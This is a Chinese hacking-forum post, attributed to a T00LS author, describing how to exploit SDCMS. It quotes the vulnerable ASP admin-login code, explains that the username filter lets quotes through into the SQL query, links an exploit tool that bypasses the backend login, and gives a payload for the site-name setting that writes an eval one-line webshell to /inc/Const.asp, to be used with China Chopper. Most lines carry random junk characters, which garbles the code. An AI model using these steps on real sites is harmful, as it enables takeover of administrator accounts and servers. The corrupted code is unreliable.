作者:T00LS 鬼哥
漏洞文件:后台目录/index.asp
3 X: j) Y- X4 t; R
Sub Check0 M( ^+ L2 n% s( f
Dim username,password,code,getcode,Rs+ v( k9 {8 B' M9 ~/ O+ b
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub% T6 R. g" B$ W/ E
username=FilterText(Trim(Request.Form("username")),1)( I9 a; R) L" f2 s3 u! C* z4 f* e3 \
password=FilterText(Trim(Request.Form("password")),1)
7 y2 ~2 {/ Z& q9 k" \5 E code=Trim(Request.Form("yzm"))
: j. z# S/ ^0 [( a getcode=Session("SDCMSCode")! ]0 F- b9 K, W+ I5 ]1 o
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
/ D3 H" O- h% r+ z' ^: u IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)"ied# @3 {3 \! Q5 G% r% Z1 J/ s
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied' _" \9 j6 {2 [
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied- O, T1 s# m( N5 a5 \) x
IF username="" or password="" Then
! [9 t8 [5 m; o) t1 N; M Echo "用户名或密码不能为空"ied
, y) s7 Y0 d5 ^ a: @ Else
# A0 ]2 }% J' M3 R4 q$ M Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")9 t+ v3 L6 J$ k/ r2 x4 i. \% n
IF Rs.Eof Then
: s9 h" \1 \( P AddLog username,GetIp,"登录失败",1
& k# I7 ]8 Z- o# a3 x$ E! b Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
& \& s) q2 n0 S. s+ p9 I Else
. C ]. Y; i, l' A1 O) K, { @4 V Add_Cookies "sdcms_id",Rs(0)
1 T) l6 i" H; A/ o! L0 j w: l Add_Cookies "sdcms_name",username
: y: h. R! c k( v- v1 N1 n Add_Cookies "sdcms_pwd",Rs(2)+ r8 o8 m5 u3 U. H- Y( W
Add_Cookies "sdcms_admin",Rs(3)
' ~ l/ O4 ]8 {8 ]) Y: }1 A Add_Cookies "sdcms_alllever",Rs(4)7 L5 b. T8 x* `7 S
Add_Cookies "sdcms_infolever",Rs(5)
, W1 H# g6 m3 ~# m' W a: [$ N- _ Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
1 a: e5 b. l9 w1 S; q; g" R/ B AddLog username,GetIp,"登录成功",1
& Y0 a* r2 l7 q- Z q3 Q5 n9 e '自动删除30天前的Log记录# g' H% Y6 @( q+ v# S) ^9 G. q6 B5 {
IF Sdcms_DataType Then0 E2 a1 X- c$ ?1 c! R7 S
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
( g* z4 ]: V6 M9 [6 T. y3 _9 [ Else
& ^; f* g- ?. `3 \9 A) v3 r) r+ q Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
9 }! [* {3 d' x& R# w8 O: g0 e End IF" }/ f, y: t4 u1 E5 W) D
Go("sdcms_index.asp")5 Z. z; i1 ?$ D1 J
End IF
9 @& ` ?+ c) f Rs.Close
, x! r. t& \- z3 K; ~7 [8 ^ Set Rs=Nothing
+ u$ O. v6 \# F/ k$ B. \ End IF4 u2 y) W- Q$ ^2 C
End Sub& H, T# ~' i7 C/ q( d
我们可以看到 username 是通过 FilterText 来过滤的。我们看看 FilterText 的代码:
' g# i4 f$ H$ F" i" U& [: EFunction FilterText(ByVal t0,ByVal t1)
/ M) L E# c5 E; y IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function, n+ i: F6 q( ?+ {. O6 P; A; }
t0=Trim(t0)
; k+ ^. w+ ]3 o' l' M4 g/ h& l Select Case t1
& @% s+ K/ x0 B$ P; k Case "1"* d: y5 \2 |5 G# q$ l
t0=Replace(t0,Chr(32),"")" P7 x& T# M2 K* L
t0=Replace(t0,Chr(13),"")4 R5 y- x; Q( o/ g
t0=Replace(t0,Chr(10)&Chr(10),"")/ c! h7 b/ Q+ O- }
t0=Replace(t0,Chr(10),"")- f* b+ `, p& T8 K' P: ]: p
Case "2"
8 C R' f% c. I- Z t0=Replace(t0,Chr(8),"")'回格. O% B8 B9 M i6 ]# m" _
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
3 q- l' G' D/ A t0=Replace(t0,Chr(10),"")'换行- h6 f1 D( M N0 r
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)2 e( ? D7 N) r* g
t0=Replace(t0,Chr(12),"")'换页9 ]% F5 n: X ^2 x9 N1 Y
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
" k$ y" V1 ]5 j' ]8 Q t0=Replace(t0,Chr(22),"")
: g# V7 p4 s& ?+ ~2 {! B9 o$ ] t0=Replace(t0,Chr(32),"")'空格 SPACE
3 h6 j+ O; A; t; @' @( n t0=Replace(t0,Chr(33),"")'!
- z8 M8 C9 d5 h' x8 P, o# j t0=Replace(t0,Chr(34),"")'"0 v+ \ t. e; l2 l5 B4 M# D3 B& W2 o- K
t0=Replace(t0,Chr(35),"")'#! R. ~! o7 v! o- m. V
t0=Replace(t0,Chr(36),"")'$8 O! `' u& d3 U8 F' o0 i
t0=Replace(t0,Chr(37),"")'%; ^, }- ~( a: k3 G
t0=Replace(t0,Chr(38),"")'&+ ^- q& j0 M* q) |/ g" R
t0=Replace(t0,Chr(39),"")''
7 h9 m$ x+ ^' r4 ^, d) i T4 ^* V t0=Replace(t0,Chr(40),"")'(9 u; S0 O; t$ m& o3 S$ Z0 C
t0=Replace(t0,Chr(41),"")')+ h j) ]8 _# a1 Z/ G
t0=Replace(t0,Chr(42),"")'*
( p. k. a S: s9 D0 j% G t0=Replace(t0,Chr(43),"")'+/ w3 H/ R" h, B$ V8 Z% g
t0=Replace(t0,Chr(44),"")',+ e- Z6 N Y. ^" N5 i# Z
t0=Replace(t0,Chr(45),"")'-' D3 s/ E4 B% d& \' I% h% v
t0=Replace(t0,Chr(46),"")'.
+ D2 S: k) O, Z6 p t0=Replace(t0,Chr(47),"")'/8 j/ T9 ^; n- R5 ?
t0=Replace(t0,Chr(58),"")':- N! Q4 g: d0 e G
t0=Replace(t0,Chr(59),"")';
6 ]1 M, K# ?+ {8 s8 A. _ t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>6 f8 l) y- D/ R7 o
t0=Replace(t0,Chr(63),"")'?
. R o0 k$ @ D/ S3 a t0=Replace(t0,Chr(64),"")'@( K3 \( p8 H# F+ z5 U
t0=Replace(t0,Chr(91),"")'\9 P; [9 ^5 x% Y) c, [
t0=Replace(t0,Chr(92),"")'\7 f5 Q/ n! Y, ?
t0=Replace(t0,Chr(93),"")']1 e* g6 D: I$ d _: y1 u
t0=Replace(t0,Chr(94),"")'^( R( }- R& c+ }! Q: I
t0=Replace(t0,Chr(95),"")'_
) @% g3 C- ^- i9 ]7 Y# X5 s/ @ t0=Replace(t0,Chr(96),"")'`( R7 \4 Z# p# \5 x; P- Q
t0=Replace(t0,Chr(123),"")'{/ A4 f& j8 K F' I3 X5 q$ f
t0=Replace(t0,Chr(124),"")'|% a' b: F4 R( e1 x
t0=Replace(t0,Chr(125),"")'}5 K, q$ _' a4 f9 u: Z' N
t0=Replace(t0,Chr(126),"")'~+ v7 o, l5 V: w% I7 y+ `
Case Else
; O' }1 t+ G1 X( | t0=Replace(t0, "&", "&")8 S X3 L+ e3 m1 O+ \9 L( v; ~
t0=Replace(t0, "'", "'")
( O" B& E0 n& w$ n2 L$ N* l, b t0=Replace(t0, """", """)3 _* { e$ D9 X$ o7 h: {6 {$ A! l
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")0 z1 i0 b1 x8 W* k2 ^" ~
End Select5 @/ C, G: t J+ m* l; i. C2 p
IF Instr(Lcase(t0),"expression")>0 Then
* m' w3 A0 C: v# t% l" ? t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
1 A7 h) h G! S1 D u% I! ?: u; m3 r End If
8 H3 L) |6 \% b5 ?" W3 E8 \) k# \ FilterText=t0
; L3 [+ P& G3 Y3 k0 n( zEnd Function
" D; a% ], o7 `0 Q J# ]% K7 I( r7 \$ n2 \+ t, @+ Y1 H: \
看到没。参数为 1 时只过滤以下字符:
t0=Replace(t0,Chr(32),"")
t0=Replace(t0,Chr(13),"")
t0=Replace(t0,Chr(10)&Chr(10),"")
t0=Replace(t0,Chr(10),"")
也就是说单引号等 SQL 元字符没有被过滤,而 username 又被直接拼接进了 SQL 语句。
7 y8 T# T: K' }; Q: H& Z2 _漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!5 C+ b& z" K( d- `, \
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP4 W8 s2 |6 d- P8 Y
* J7 C$ E$ c u) I- ]1 z测试:. w: I# U! U1 N
, R; s4 @1 Y5 g9 Q8 d5 p. x$ h( m8 {; h; A/ |; ~' o( }3 e1 Q4 P1 S
现在输入工具上验证码,然后点OK
! c$ }( B/ R0 E# S4 t7 Z; f4 }3 B6 Z9 S: _* _2 X& u) f
7 l3 R" O0 Y& c& b. j. N' ^
看到我们直接进入后台管理界面了,呵呵!0 b. O B2 s9 a+ ?6 |! v1 g$ n
- |+ p! z8 M ]0 J2 s9 z9 g; O8 G! s- {: d! ]4 E& b
5 l$ V B6 k$ R/ g5 `这样直接进入后台了。。。。' I" b! d' r/ y2 }- k8 T x0 _
: z- t- p, t R
* c( Y; ~! W/ M c
0 i2 Z; z! H1 l! y; j9 c) VSDCMS提权:
& W6 k& V/ C) \) |! I
4 [. S1 p: _- ^4 j' J7 e V方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
) @7 ^0 ~- g: ^& e% {/ y6 [+ x. C0 A) T7 M5 D
: y" r4 A; s$ Q2 H
$ ~5 d( R* H K, L" q/ bOK,现在用菜刀连接下!; Z* f" ` E+ a- F' Z) Z+ R" a1 L
+ o% | ]9 d/ B! l6 g0 V$ @2 D k
/ w' R, t- D, x1 l; f0 A& \0 u( @! R- D \# p
) {+ A7 y1 O5 C/ f( ]4 u0 G+ ]( k
' K- I2 {- R' w6 K |